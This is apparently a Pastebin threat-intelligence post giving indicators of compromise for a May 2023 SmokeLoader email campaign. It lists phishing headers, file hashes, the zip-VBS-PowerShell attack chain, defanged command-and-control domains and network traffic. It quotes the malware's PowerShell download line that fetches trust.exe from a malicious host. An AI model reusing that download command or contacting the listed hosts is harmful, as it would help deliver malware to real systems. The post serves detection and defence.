Advertisement
VRad

#smokeloader_300523

May 30th, 2023 (edited)
442
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.04 KB | None | 0 0
  1. #IOC #OptiData #VR #smokeloader #ZIP #PSWEB #VBS
  2.  
  3. https://pastebin.com/DgFvarG0
  4.  
  5. previous_contact:
  6. https://pastebin.com/AayUSaXq
  7. https://pastebin.com/RDVXCe0J
  8. https://pastebin.com/QpG70u8T
  9. https://pastebin.com/BJzcXqkK
  10. https://pastebin.com/kBW7nkZ5
  11. https://pastebin.com/Z7zq0YkW
  12. https://pastebin.com/b8PkhMyN
  13. https://pastebin.com/hkskwKvc
  14. https://pastebin.com/JmthzrL4
  15. https://pastebin.com/1scwT0f8
  16. https://pastebin.com/MP3kCSSh
  17.  
  18. FAQ:
  19. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  20. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  21.  
  22. attack_vector
  23. --------------
  24. email attach .zip? > .VBS > WSH > PowerShell > URL > get download string > %temp%\*.exe
  25.  
  26.  
  27. # # # # # # # #
  28. email_headers
  29. # # # # # # # #
  30. Return-Path: <[email protected]>
  31. Received: from mail.emm.ua (mail.t-sna.com [193.19.240.25])
  32. Received: from internal.domain; Tue, 30 May 2023 08:39:18 +0300
  33. Date: Tue, 30 May 2023 08:39:15 +0300
  34. Subject: Re: акт звірки та рахунки
  35. From: бух. відділ <[email protected]>
  36. Message-ID: <[email protected]>
  37.  
  38.  
  39. # # # # # # # #
  40. other senders
  41. # # # # # # # #
  42. operator.lv01[@]emm[.]ua
  43. support[@]romb[.]ua
  44.  
  45.  
  46. # # # # # # # #
  47. files
  48. # # # # # # # #
  49. SHA-256 54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088
  50. File name Рахунок (без ПДВ) № 28 від 28.05.2023.zip [ Zip archive data ]
  51. File size 65.67 KB (67242 bytes)
  52.  
  53. SHA-256 6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4
  54. File name Рахунок (без ПДВ) № 28 від 28.05.2023.pdf [ PDF document, version 1.4 ] ! - CLEAN
  55. File size 60.86 KB (62318 bytes)
  56.  
  57. SHA-256 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
  58. File name AKT_28_05_2023p._pax_28_05_2023p.vbs [ JavaScript ]
  59. File size 22.90 KB (23454 bytes)
  60.  
  61. SHA-256 9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
  62. File name trust.exe [ PE32 executable (GUI) ]
  63. File size 274.00 KB (280576 bytes)
  64.  
  65.  
  66. # # # # # # # #
  67. activity
  68. # # # # # # # #
  69.  
  70. PL_SCR americanocoffea{ .ru > $client.downloadfile('http://americanocoffea{ .ru/antirecord/trust.exe',$path) ! - may change URL and filename
  71. $client.downloadfile('http://jskgdhjkdfhjdkjhd844{ .ru/antirecord/trust.exe',$path)
  72.  
  73. C2
  74.  
  75. polinamailserverip{ .ru/
  76. lamazone{ .site/
  77. criticalosl{ .tech/
  78. maximprofile{ .net/
  79. zaliphone{ .com/
  80. humanitarydp{ .ug/
  81. zaikaopentra{ .com.ug/
  82. zaikaopentra-com-ug{ .online/
  83. infomalilopera{ .ru/
  84. jskgdhjkdfhjdkjhd844{ .ru/
  85. jkghdj2993jdjjdjd{ .ru/
  86. kjhgdj99fuller{ .ru/
  87. azartnyjboy{ .com/
  88. zalamafiapopcultur{ .eu/
  89. hopentools{ .site/
  90. kismamabeforyougo{ .com/
  91. kissmafiabeforyoudied{ .eu/
  92. gondurasonline{ .ug/
  93. nabufixservice{ .name/
  94. filterfullproperty{ .ru/
  95. alegoomaster{ .com/
  96. freesitucionap{ .com/
  97. droopily{ .eu/
  98. prostotaknet{ .net/
  99. zakolibal{ .online/
  100. verycheap{ .store/
  101.  
  102.  
  103. netwrk
  104. --------------
  105. 176.124.193.111 americanocoffea{ .ru 80 HTTP GET / HTTP/1.1
  106. 176.124.193.111 americanocoffea{ .ru 80 HTTP GET /antirecord/trust.exe HTTP/1.1
  107.  
  108. comp
  109. --------------
  110. 195.123.219.57 freesitucionap{ .com 80 HTTP POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  111.  
  112. proc
  113. --------------
  114.  
  115.  
  116. persist
  117. --------------
  118. n/a
  119.  
  120.  
  121. drop
  122. --------------
  123. C:\Users\%username%\AppData\Local\Temp\%random%.exe
  124.  
  125.  
  126. # # # # # # # #
  127. additional info
  128. # # # # # # # #
  129. n/a
  130.  
  131.  
  132. # # # # # # # #
  133. VT & Intezer
  134. # # # # # # # #
  135. https://www.virustotal.com/gui/file/54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088/details
  136. https://www.virustotal.com/gui/file/6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4/details
  137. https://www.virustotal.com/gui/file/375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936/details
  138. https://www.virustotal.com/gui/file/9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330/details
  139. https://analyze.intezer.com/analyses/f6d5cfe5-181c-490f-8551-ae9bc12b64c3
  140.  
  141. VR
  142.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement